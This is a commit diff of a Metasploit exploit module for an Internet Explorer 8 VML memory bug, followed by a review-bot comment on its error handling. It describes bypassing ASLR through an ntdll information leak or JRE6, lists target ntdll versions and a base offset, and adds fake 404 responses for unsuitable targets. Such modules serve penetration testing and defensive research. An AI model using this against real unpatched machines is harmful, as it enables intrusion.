Change description a bit
parent
2dedaee9ca
commit
bb9c961847
|
@ -10,17 +10,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
include Msf::Exploit::Remote::BrowserExploitServer
|
||||
include Msf::Exploit::RopDb
|
||||
#include Msf::Exploit::Remote::BrowserAutopwn
|
||||
|
||||
#autopwn_info({
|
||||
# :ua_name => HttpClients::IE,
|
||||
# :ua_minver => "8.0",
|
||||
# :ua_maxver => "8.0",
|
||||
# :javascript => true,
|
||||
# :os_name => OperatingSystems::Match::WINDOWS,
|
||||
# :rank => Rank
|
||||
#})
|
||||
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
|
@ -30,15 +19,18 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
The vulnerability exists in the handling of the dashstyle.array length for vml
|
||||
shapes on the vgx.dll module.
|
||||
|
||||
This module has been built and tested specifically against Windows 7 SP1 with
|
||||
The exploit has been built and tested specifically against Windows 7 SP1 with
|
||||
Internet Explorer 8. It uses either JRE6 or an information leak (to ntdll) to
|
||||
bypass ASLR, and by default the info leak is used. The ntdll version should be
|
||||
either v6.1.7601.17514 (the default dll version on a newly installed/unpatched
|
||||
Windows 7 SP1), or ntdll.dll v6.1.7601.17725 (installed after apply MS12-001).
|
||||
bypass ASLR, and by default the info leak is used. To make sure the leak is
|
||||
successful, the ntdll version should be either v6.1.7601.17514 (the default dll
|
||||
version on a newly installed/unpatched Windows 7 SP1), or ntdll.dll v6.1.7601.17725
|
||||
(installed after apply MS12-001). If the target doesn't have the version the exploit
|
||||
wants, it will refuse to attack by sending a fake 404 message (webpage not found).
|
||||
|
||||
If you wish to try the JRE6 component instead to bypass ASLR, you can set the
|
||||
advanced datastore option to 'JRE6'. If JRE6 is chosen but the target doesn't
|
||||
have this particular component, the exploit will refuse the attack.
|
||||
have this particular component, the exploit will also refuse to attack by
|
||||
sending a 404 message.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
|
@ -389,6 +381,7 @@ function exploit(){
|
|||
rescue RuntimeError => e
|
||||
# This one is just a warning, because it's a requirement check so it's not that scary.
|
||||
print_warning(e.message)
|
||||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
|
||||
|
@ -421,7 +414,7 @@ function exploit(){
|
|||
@ntdll_version = "6.1.7601.17725" # MS12-001
|
||||
@ntdll_base = leak - 0x47090
|
||||
else
|
||||
print_error("ntdll version not detected, sending 404: #{agent}")
|
||||
print_warning("ntdll version not detected, sending 404: #{agent}")
|
||||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
|
|
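Review bot: The `rescue RuntimeError => e` in the third hunk (`@@ -389,6 +381,7 @@`) downgrades every RuntimeError raised in the surrounding body to a print_warning plus a 404 response, not only the requirement-check failure the new comment describes, so a genuine bug on that code path would be reported as a benign "target not suitable" condition. Where the requirement check raises is outside this hunk, as is the start of the enclosing method; if it raises a plain RuntimeError, a module-local StandardError subclass raised there and named in the rescue (`rescue RequirementCheckError => e`, with the class defined in the module) would confine the warning path to that case alone. The comment could then state the intent rather than the severity: `# Requirement check failed: answer with a 404 instead of aborting the module.` Separately, the new description text in the second hunk keeps the phrase "installed after apply MS12-001"; "installed after applying MS12-001" reads correctly.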